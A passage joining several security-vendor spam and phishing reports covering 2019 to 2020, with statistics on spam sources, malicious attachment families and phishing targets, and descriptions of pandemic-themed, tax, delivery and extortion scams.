Italy’s share (5.45%) fell slightly, but that country remained in fourth place. Vietnam, which had previously rounded out the top three, dropped to fifth place with 5.20%, and the United Arab Emirates, with 4.46%, to sixth. Mexico, with 3.34%, rose from ninth to seventh place, followed by Brazil, with 3.33%. Turkey, with 2.91%, and Malaysia, with 2.46%, rounded out the rankings, while India, 2.34%, landed in eleventh place last year.

Statistics: phishing

In 2020, Anti-Phishing was able to block 434,898,635 attempts at redirecting users to phishing web pages. That is 32,289,484 fewer attempts than in 2019. A total of 13.21% of Kaspersky users were attacked worldwide, with 6,700,797 masks describing new phishing websites added to the system database.

Attack geography

In 2020, Brazil regained its leadership by number of Anti-Phishing detections, with 19.94% of users trying to open phishing links at least once.

Geography of phishing attacks in 2020 (download)

TOP 10 countries by number of attacked users

The countries with the largest numbers of attempts at opening phishing websites in 2018 “topped the rankings” again in 2020: Brazil, with 19.94%, in first place, and Portugal, with 19.73%, in second place. Both countries’ indicators dropped remarkably from 2019, Brazil “losing” 10.32 p.p. and Portugal, 5.9 p.p. France, which had not been seen among the ten “leaders” since 2015, was in third place with 17.90%.

Venezuela, last year’s “leader”, had the largest numbers in the first two quarters of 2020, but came out eighth overall, the share of attacked users in that country decreasing by 14.32 p.p. to 16.84%.

* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2020

Top-level domains

Most scam websites, 24.36% of the total number, had a .com domain name extension last year. Websites with a .ru extension were 22.24 p.p. behind with 2.12%. All other top-level domains in the “top ten” are various country-code TLDs: the Brazilian .com.br with 1.31% in third place, with Germany’s .de, (1.23%), and Great Britain’s .co.uk (1.20%) in fourth and fifth places, respectively. In sixth place was the Indian domain extension .in, with 1.10%, followed by France’s .fr with 1.08%, and Italy’s .it with 1.06%. Rounding out the rankings were the Dutch .nl, with 1.03%, and the Australian .com.au, with 1.02%.

Most frequent top-level domains for phishing pages in 2020 (download)

Organizations under attack

The rating of attacks by phishers on different organizations is based on detections by Kaspersky Lab’s Anti-Phishing deterministic component. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Last year’s events affected the distribution of phishing attacks across the categories of targeted organizations. The three largest categories had remained unchanged for several years: banks, payment systems and global Internet portals. The year 2020 brought change. Online stores became the largest category with 18.12%, which may be linked to a growth in online orders due to pandemic-related restrictions. Global Internet portals remained the second-largest category at 15.94%, but their share dropped by 5.18 p.p. as compared to 2019, and banks were third with a “modest” 10.72%.

Online games and government and taxes dropped out of the “top ten” in 2020. They were replaced by delivery companies and financial services.

Distribution of organizations targeted by phishers, by category in 2020 (download)

Conclusion

With its pandemic and mass transition to remote work and online communication, last year was an unusual one, which was reflected in spam statistics. Attackers exploited the COVID-19 theme, invited victims to non-existent video conferences and insisted that their targets register with “new corporate services”. Given that the fight against the pandemic is not over yet, we can assume that the main trends of 2020 will stay relevant into the near future.

The general growing trend of targeted attacks on the corporate sector will continue into next year, all the more so because the remote work mode, increasingly popular, makes employees more vulnerable. Users of instant messaging networks should raise their guard, as the amount of spam and phishing messages received by their mobile devices is likely to grow as well. Besides, the number of email messages and schemes exploiting the COVID-19 theme one way or another has a high likelihood of rising.

Quarterly highlights

Targeted attacks

The second quarter often saw phishers resort to targeted attacks, especially against fairly small companies. To attract attention, scammers imitated email messages and websites of companies whose products or services their potential victims could be using.

The scammers did not try to make any of the website elements appear credible as they created the fake. The login form is the only exception. One of the phishing websites we discovered even used a real captcha on that form.

The main pretext that scammers use to prompt the target to enter their information is offering an online catalog that purportedly only becomes available once the target provides the login and password to their email account.

In one instance, phishers used Microsoft Sway, the service for creating and sharing presentations, to hunt for logins and passwords for corporate accounts. The user was offered to view presentations belonging to another company in the same industry by following a link and entering the login and password for their work email account.

A fake website can be recognized by its design. The workmanship is often rough, and the chunks of information on the various pages are disjointed due to being pulled from diverse sources. Besides, pages like that are created on free hosting websites, as cybercriminals are not prepared to invest too much money in the fakes.

A targeted phishing attack may lead to serious consequences: after gaining access to an employee’s mailbox, cybercriminals can use it for further attacks on the company itself, or its employees or partners.

Waiting for your package: keeping your data secure and your computer, clean

As the pandemic reached its peak, mail service between countries became complicated and delivery times noticeably increased. Organizations responsible for delivery of letters and parcels rushed to notify recipients about all kinds of possible delays and hiccups. This is exactly the type of email messages that scammers started to imitate: the target was offered to open the attachment to find out the address of the warehouse with the package that had failed to reach them.

Another, relatively original, trick employed by cybercriminals was a message containing a miniature image of a postal receipt. The scammers expected the curious recipient to take the attachment, which was an ACE archive despite its name containing “jpg”, for the real thing and open it. The mailshots we detected used this as a method of spreading the Noon spyware. The scam can only be detected if the email client displays the full names of attachments.

In another fraudulent scheme, the target was to told that their order could not be dispatched due to a restriction on mailing of certain types of goods, but the processing of the package would be resumed once the restrictions were lifted. All required documents and a new tracking number could purportedly be found in the attached archive. In reality, the attachment contained a copy of the Androm backdoor, which opened remote access to the victim’s computer.

Scammers posing as courier service employees sent out email warning that packages could not be delivered due to failure to pay for the shipping. The “couriers” accepted codes for prepaid cards issued by Paysafecard as payment. These cards range from €10 to €100 and can be used in stores that accept this payment method. The victim was offered to email a €50 card code – incidentally, an activity that the payment system’s rules explicitly forbid. The cybercriminals chose this payment method for a reason: blocking or revoking a Paysafecard payment is next to impossible.

Banking phishing amid a pandemic

Banking phishing attacks in the second quarter of the year often employed emails that offered borrowers various pandemic-related discounts and bonuses. Accessing the benefits involved downloading a file with a manual or following a link. As a result, the scammers could access the user’s computer, personal data or credentials for various services, depending on the scheme.

The COVID-19 theme was present, too, in the widely known fake bank emails informing customers that their accounts had been blocked, and that they needed to enter their login and password on a special page to get back their access.

The pandemic saw the revival of a more-than-a-decade-old scheme, in which scammers sent victims emails offering to open the attachment to get the details of a low-rate loan. This time, the rate reduction was linked to the pandemic.

Taxes and exemptions

The beginning of the second quarter is the time for submitting tax forms in many countries. This year, tax authorities in some countries reduced the tax burden or exempted citizens from paying taxes. Scammers naturally grabbed the opportunity: mailshots we detected reported that the government had approved a compensation payout, and claiming it involved following a link to the tax agency’s website, which, unsurprisingly, proved to be fake. Some of the email messages were not too well crafted, and looking closely at the From field was all it took to detect a fake.

More ingenious scammers made up a whole legend: in an email presented as being from the IRS (United States Internal Revenue Service), they said there was a $500,000 “pandemic payment”, authorized jointly by the UN and the World Bank, that could be transferred to the recipient if it had not been for a woman named Annie Morton. The lady, the email said, had showed up at an IRS office carrying a warrant for the payment. She purportedly said that the intended recipient had succumbed to COVID-19, and she was the one to receive the $500,000. The message insisted that the victim contact a certain IRS employee – and not any other, so as to avoid a mistake – to prove that they were alive.

Subsequent steps would most likely be identical to the well-known inheritance scam, where the victim would be offered to pay for the services of a lawyer, who would then disappear with the advance money. One might guess that instead of the advance, the scammers would ask for a fee for executing papers that would prove the victim was still alive.

Getting refunded and losing it all

Tax refunds are not the only type of aid that states have been providing to individuals and companies distressed by the pandemic. And not the only type the scammers have been using. Thus, Brazilians were “allowed” not to pay their energy bills, and all they had to do was register on a website by following a link in an “email from the government”. The hyperlink had an appearance designed to trick the user into thinking that they were being redirected to a government portal, whereas in reality, the victim had a trojan installed on their computer, which downloaded and then ran another trojan, Sneaky.

Personal information leak is another hazard faced by those who risk registering for “compensation” on a suspicious website. For example, one mailshot offered individuals aged over seventy to go to a website and fill out a form, which contained fields for the last name, first name, gender, mailing address and SSN (social security number, for US citizens).

Identifying a fake email is easy. One just needs to take a closer look at the From field and the subject, which appears odd for an official email.

Once the target filled out the entire form, they were redirected to the official Web page of the World Health Organization’s COVID-19 Solidarity Response Fund, a real organization, to give a donation. This helped the scammers to create an illusion that the questionnaire was official and to build a vast database containing the details of individuals over seventy years of age.

Fake emails promising government compensations carried one more threat: instead of getting paid, the victim risked losing their own money to the cybercriminals. Thus, a fake email from the International Monetary Fund announced that the recipient and sixty-four other “lucky” individuals had been selected to receive compensations from a five-hundred-million-dollar fund set up by the IMF, China and the European Union for supporting victims of the pandemic. Getting €950,000 was a matter of contacting the IMF office at the address stated in the message. Subsequent events followed the lottery-scam script: getting the money required paying a commission first.

Fake HR: getting dismissed by professional spammers

The pandemic-related economic downturns in several countries caused a surge in unemployment, an opportunity that cybercriminals were quick to take advantage of. One mailshot, sent in the name of the US Department of Labor, offered looking at the latest changes to the parental leave and sick leave laws. The sender said these laws had been amended following the adoption of the coronavirus relief act, and all details on the amendments were available in the attachment. What the attachment really contained was Trojan-Downloader.MSOffice.SLoad.gen, a trojan mostly used for downloading and installing ransomware.

Another way scammers “surprised” potential victims was dismissal notices. The employee was informed that the company had been forced to discharge them due to the pandemic-induced recession. The dismissal “followed the book”, in that the attachment, according to the author of the email, contained a request form for two months’ worth of pay. Needless to say, the victim only found malware attached.

Your data wanted, now

The share of voice phishing in email traffic rose noticeably at the end of Q2 2020. One mailshot warned of a suspicious attempt at logging in to the target’s Microsoft account, originating in another country, and recommended that the target contact support by phone at the supplied number. This spared the scammers the need to create a large number of fake pages, as they tried to get all the information they needed over the phone.

An even less conventional way of obtaining personal data could be found in emails that offered subscription to COVID-19 updates, where the target only needed to verify their email address. Besides personal data theft, forms like this can be used for collecting mailbox usage statistics.

Statistics: spam

Proportion of spam in email traffic

Proportion of spam in global email traffic, Q1 2020 – Q2 2020 (download)

In Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50,18%, down by 4.43 percentage points from the previous reporting period.

Proportion of spam in Runet email traffic, Q1 2020 – Q2 2020 (download)

The Russian segment of the World Wide Web presents the opposite picture, with the end of the quarter accounting for the larger share of spam: spam peaked in June as it reached 51.23 percent. The quarterly average was 50.35 percent, 1.06 p.p. lower that the first quarter’s average.

Sources of spam by country

Countries where spam originated in Q2 2020 (download)

The composition of the top five Q1 2020 spam leaders remained unchanged in the second quarter. Russia kept the lead with 18.52 percent, followed by Germany with 11.94 percent, which had overtaken the US, now third with 10.65 percent. France (7.06 percent) and China (7.02 percent) remained fourth and fifth, respectively.

Sixth was the Netherlands (4.21 percent), closely followed by Brazil (2.91 percent), Turkey (2.89 percent), Spain (2.83 percent) and lastly, Japan (2.42 percent).

Spam email size

Spam email size, Q1 – Q2 2002 (download)

The share of extra small emails kept going down, dropping by 8.6 p.p. to 51.30 percent in Q2 2020. Emails between 5 KB and 10 KB decreased slightly (by 0.66 p.p.) compared to the previous quarter, to 4.90 percent. Meanwhile, the share of spam messages within the range of 10 KB to 20 KB rose by 4.73 p.p. to 11.09 percent. The share of larger messages between 100 KB and 200 KB in the second quarter fell by 1.99 p.p. to 2.51 percent compared to Q1 2020.

Malicious attachments: malware families

Number of Mail Anti-Virus triggerings, Q1 2020 – Q2 2020 (download)

Our security solutions detected a total of 43,028,445 malicious email attachments in Q2 2020, an increase of six and a half million year-on-year.

TOP 10 malicious attachments in mail traffic, Q2 2020 (download)

Trojan.Win32.Agentb.gen (13.27 percent) was the most widespread malware in email attachments in the second quarter of the year, followed by Trojan-PSW.MSIL.Agensla.gen (7.86 percent) in second place and Exploit.MSOffice.CVE-2017-11882.gen (7.64 percent) in third place.

TOP 10 malware families in mail traffic, Q2 2020 (download)

The most widespread malware family in the second quarter, as in the previous one, was Trojan.Win32.Agentb (13.33 percent), followed by Trojan-PSW.MSIL.Agensla (9.40 percent) and Exploit.MSOffice.CVE-2017-11882 (7.66 percent).

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggerings by country, Q2 2020 (download)

Spain (8.38%) took the lead in Mail Anti-Virus triggerings in Q2 2020, just as in Q1 2020. Second came Russia with 7.37 percent of attacks, and third came Germany with 7.00 percent.

Statistics: phishing

Kaspersky Anti-Phishing helped to prevent 106,337,531 attempts at redirecting users to phishing Web pages in Q2 2020, a figure that is almost thirteen million lower than that for the first quarter. The share of unique attacked users accounted for 8.26 percent of the total Kaspersky users in the world, with 1,694,705 phishing wildcards added to the system database.

Attack geography

Venezuela was traditionally the country with the largest share of users attacked by phishers (17.56 percent).

Geography of phishing attacks, Q2 2020 (download)

Portugal was 4.05 p.p. behind with 13.51 percent, closely followed by Tunisia with 13.12 percent.

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Top-level domains

Starting with this quarter, we have decided to maintain statistics on top-level domains used in phishing attacks. Quite predictably, COM led by a huge margin, with 43.56 percent of the total number of top-level domain names employed in attacks. It was followed by NET (3.96 percent) and TOP (3.26 percent). The Russia-specific RU domain took fourth place with 2.91 percent, followed by ORG with 2.55 percent.

Top-level domains most popular with phishers, Q2 2020 (download)

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access by following email or Web links, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

 As in the first quarter, the Online Stores category accounted for the largest share of phishing attacks, its share increasing by 1.3 p.p. to 19.42 percent. Global Web Portals again received the second-largest share of attacks, virtually unchanged at 16.22 percent. Banks (11.61 percent) returned to third place, pushing Social Networks (10.08 percent) to fourth place.

Distribution of organizations subjected to phishing attacks by category, Q2 2020 (download)

Conclusion

In our summary of the first quarter, we hypothesized that COVID-19 would remain spammers’ and fishers’ key theme in the future. That is exactly what happened: seldom did a mailshot fail to mention the pandemic as phishers added relevance to their tried and tested schemes and came up with brand-new ones.

The average share of spam in global email traffic in Q2 2020 dropped by 4.43 p.p. to 50.18 percent compared to the previous reporting period, and attempts to access phishing pages amounted to 106 million.

First place in the list of spam sources in Q2 went to Russia with a share of 18.52 percent. Our security solutions blocked a total of 43,028,445 malicious email attachments, with the most widespread “email-specific” malware family being Trojan.Win32.Agentb.gen, which infected 13.33 percent of the total email traffic.

Quarterly highlights

Don’t get burned

Burning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). Therefore, half-price fake tickets make for excellent bait.

Scammers tried to make their website as close as possible to the original — even the page with the ticket description looked genuine.

There were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were “sold” without prior registration, and the price was a steal ($225 versus $475).

Oscar-winning scammers

February 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.

To promote these sites, Twitter accounts were created — one for each nominated film.

Curious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.

During registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.

Users should be alert to the use of short links in posts on social networks. Scammers often use them because it’s impossible to see where a shortened URL points without actually following it.

There are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.

ID for hire

US companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.

Inspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was “yes” even if the input was gibberish), they were promised compensation “for the leakage of personal data.”

To receive “compensation,” the victim’s citizenship was of no consequence — what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people’s data to claim compensation popped up obsessively on the page.

To receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words “I’am don’t have SSN” (the mistakes are a good indicator of a fake), whereupon they were invited to “rent” an SSN for $9. Interestingly, even if the user already had an SSN, they were still pestered to get another one.

After that, the potential victim was redirected to a payment page with the amount and currency based on the user’s location. For instance, users in Russia were asked to pay in rubles.

The scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.

Disaster and pandemic

Fires in Australia

The natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one “Nigerian prince”-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman’s account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.

Besides the fictional millionaire, other “nature lovers” were keen to help out — their e-mails were more concise, but the scheme was essentially the same.

COVID-19

“Nigerian prince” scheme

COVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purpsoses. Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.

Bitcoin for coronavirus

Having introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.

In one e-mail, the attackers played on people’s fear of contracting COVID-19: the message was from an unnamed “neighbor” claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer’s parents).

Dangerous advice from the WHO

One fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.

To get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.

In addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained Backdoor.Win32.Androm.tvmf:

There were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:

Corporate segment

The coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and required to check attached files immediately.

Another mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic. After which it asked for a form to be filled out, otherwise the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. In actual fact, the attachments contained Trojan-PSW.MSIL.Agensla.a:

We also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim’s corporate mail account were required.

Government compensation

The introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.

One such popular scheme was highlighted by a colleague of ours from Brazil. A WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.

Given that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.

Anti-coronavirus protection with home delivery

Due to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.

In Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.

The number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.

On average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.

Statistics: spam

Proportion of spam in mail traffic

Proportion of spam in global mail traffic, Q4 2019 – Q1 2020 (download)

In Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.

Proportion of spam in Runet mail traffic, Q4 2019 – Q1 2020 (download)

In Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).

Sources of spam by country

Sources of spam by country, Q1 2020 (download)

In Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.

Brazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.

Spam e-mail size

Spam e-mail size, Q4 2019 – Q1 2020 (download)

Compared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.

Meanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100–200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.

Malicious attachments in e-mail

Number of Mail Anti-Virus triggerings, Q4 2019 – Q1 2020 (download)

In Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).

TOP 10 malicious attachments in mail traffic, Q1 2020 (download)

In Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.

TOP 10 malicious families in mail traffic, Q1 2020 (download)

As regards malware families, the most widespread this quarter was Trojan.Win32.Agentb (12.51%), with Exploit.MSOffice.CVE-2017-11882 (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and Worm.Win32.wbvb (4.65%) in third.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggerings by country, Q1 2020 (download)

First place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.

Statistics: phishing

In Q1 2020, the Anti-Phishing system prevented 119,115,577 attempts to redirect users to scam websites. The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.

Attack geography

The country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).

Geography of phishing attacks, Q1 2020 (download)

In second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.

* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky products Anti-Phishing component. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of a malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

The largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.

Distribution of organizations affected by phishing attacks by category, Q1 2020 (download)

As for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.

Conclusion

Glancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on “standard” fake pages and in spam mailings.

The topic is also used extensively in fraudulent schemes offering compensation and material assistance.

It is highly likely that this type of fraud will become more frequent.

The average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.

Top of this quarter’s list of spam-source countries is Russia, with a share of 20.74%. Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.

Figures of the year

• The share of spam in mail traffic was 56.51%, which is 4.03 p.p. more than in 2018.
• The biggest source of spam this year was China (21.26%).
• 78.44% of spam e-mails were less than 2 KB in size.
• Malicious spam was detected most commonly with the Exploit.MSOffice.CVE-2017-11882 verdict.
• The Anti-Phishing system was triggered 467,188,119 times.
• 15.17% of unique users encountered phishing.

Trends of the year

Beware of novelties

In 2019, attackers were more active than usual in their exploitation of major sports and movie events to gain access to users’ financial or personal data. Premieres of TV shows and films, and sports broadcasts were used as bait for those looking to save money by watching on “unofficial” resources.

A search for “Watch latest X for free” (where X = Avengers movie, Game of Thrones season, Stanley Cup game, US Open, etc.) returned links to sites offering the opportunity to do precisely that. On clicking through to these resources, the broadcast really did begin, only to stop after a couple of minutes. To continue viewing, the user was prompted to create a free account (only an e-mail address and password were required). However, when the Continue button was clicked, the site asked for additional confirmation.

And not just any old information, but bank card details, including the three-digit security code (CVV) on the reverse side. The site administrators assured that funds would not be debited from the card, but that this data was needed only to confirm the user’s location (and hence right to view the content). However, instead of continuing the broadcast, the scammers simply pocketed the details.

New gadgets were also deployed as a bait. Cybercriminals created fake pages mimicking official Apple services. The number of fake sites rose sharply after the company unveiled its new products. And while Apple was only just preparing to release the next gadget, fraudsters were offering to “sell” it to those with itchy hands. All that victim had to do was follow a link and enter their AppleID credentials — the attackers’ objective.

The price of fame: attackers exploit popular resources

In 2019, scammers found new ways to exploit popular resources and social networks to spread spam and sell non-existent goods and services. They actively used Youtube and Instagram comments to place ads and links to potentially malicious pages, and created numerous social media accounts that they promoted by commenting on the posts of popular bloggers.

For added credibility, they left many fake comments on posts about hot topics. As the account gained a following, it began to post messages about promotions. For example, a sale of branded goods at knock-down prices. Victims either received a cheap imitation or simply lost their cash.

A similar scheme was used to promote get-rich-quick-online videos, coupled with gushing reviews from “newly flush” clients.

Another scam involved fake celebrity Instagram accounts. The “stars” asked fans to take a survey and get a cash payout or the chance to participate in a prize draw. Naturally, a small upfront fee was payable for this unmissable opportunity… After the cybercriminals received the money, the account simply disappeared.

Besides distributing links through comments on social networks, scammers utilized yet another delivery method in the shape of Google services: invitations to meetings sent via Google Calendar or notifications from Google Photos that someone just shared a picture were accompanied by a comment from the attackers with links to fake promotions, surveys, and prize giveaways.

Other Google services were also used: links to files in Google Drive and Google Storage were sent inside fraudulent e-mails, which spam filters are not always able to spot. Clicking it usually opened a file with adware (for example, fake pharmaceutical products) or another link leading to a phishing site or a form for collecting personal data.

Although Google and others are constantly working to protect users from scammers, the latter are forever finding new loopholes. Therefore, the main protection against such schemes is to pay careful attention to messages from unfamiliar senders.

Malicious transactions

In Q1, users of the Automated Clearing House (ACH), an electronic funds-transfer system that facilitates payments in the US, fell victim to fraudsters: we registered mailings of fake ACH notifications about the status of a payment or debt. By clicking the link or opening the attachment, the user risked infecting the computer with malware.

Anyone order bitcoin?

Cryptocurrency continues to be of interest to scammers. Alongside the standard fakes of well-known cryptocurrency exchanges, cybercriminals have started creating their own: such resources promise lucrative exchange rates, but steal either personal data or money.

Cryptocurrencies and blackmail

If in 2018 cybercriminals tried to blackmail users by claiming to have malware-obtained compromising material on them, in 2019 e-mails began arriving from a CIA agent (the name varied) supposedly dealing with a case opened against the message recipient pertaining to the storage and distribution of pornographic images of minors.

The case, the e-mail alleged, was part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “agent” happened to know that the recipient was a well-heeled individual with a reputation to protect, and for $10,000 in bitcoin would be willing to alter or destroy the dossier (all information about the victim to add credence to the e-mail was harvested in advance from social networks and forums). For someone genuinely afraid of the potential consequences, this would be a small price to pay.

Legal entities found themselves in an even more desperate situation when faced with similar threats. However for them it was not about sextortion, but spamming. The blackmailers sent a message to the company using its public e-mail address or online feedback form in which they demanded a ransom in bitcoin. If refused, the attackers threatened to send millions of spam e-mails in the company’s name. This, the cybercriminals assured, would prompt the Spamhaus Project to recognize the resource as a spammer and block it forever.

Corporate sector in the crosshairs

The growing trend for attacks on the corporate sector is reflected not only in the attempts to cyber-blackmail companies. The reputation of many firms has been compromised by spam mailings through feedback forms. Having previously used such forms to attack the mailboxes of company employees, in 2019 cybercriminals evolved their methods.

As such, messages about successful registation on a particular website were received by people who had never even heard about it. After finding a security hole in the site, spammers used a script to bypass the CAPTCHA system and mass-register users via the feedback form. In the Username field, the attackers inserted message text or link. As a result, the victim whose mailing address was used received a registration confirmation e-mail from a legitimate sender, but containing a message from the scammers. Moreover, the company itself had no idea that this was going on.

A far more serious threat came from mailings masked as automatic notifications from services used to compile legitimate mailing lists: the scammers’ messages were carefully disguised as notifications about new voice messages (some business products have a feature for exchanging voice messages) or about incoming e-mails stuck in the delivery queue. To access them, the employee had to go through an authentication process, whereupon the corporate account credentials ended up in the hands of the attackers.

Scammers devised new methods to coax confidential data out of unsuspecting company employees. For example, by sending e-mails requesting urgent confirmation of corporate account details or payment information with a link conveniently supplied. If the user swallowed the bait, the authentication data for their account went straight to the cybercriminals.

Another attack aimed at the corporate sector employed a more complex scheme: the attackers tried to dupe e-mail recipients into thinking that the company management was offering a pay rise in exchange for taking a performance review.

The message appeared to come from HR and contained detailed instructions and a link to a bogus appraisal form. But before going through the procedure, the recipient had to enter a few details (in most cases it was specified that the e-mail address had to be a corporate one). After clicking the Sign in or Appraisal button, the entered credentials were duly forwarded to the attackers, granting them access to business correspondence, personal data, and probably confidential information too, which could later be used for blackmail or sold to competitors.

A simpler scheme involved sending phishing e-mails supposedly from services used by the company. The most common were fake notifications from HR recruiting platforms.

Statistics: spam

Proportion of spam in mail traffic

The share of spam in mail traffic in 2019 increased by 4.03 p.p. to 56.51%.

Proportion of spam in global mail traffic, 2019 (download)

The lowest figure was recorded in September (54.68%), and the highest in May (58.71%).

Sources of spam by country

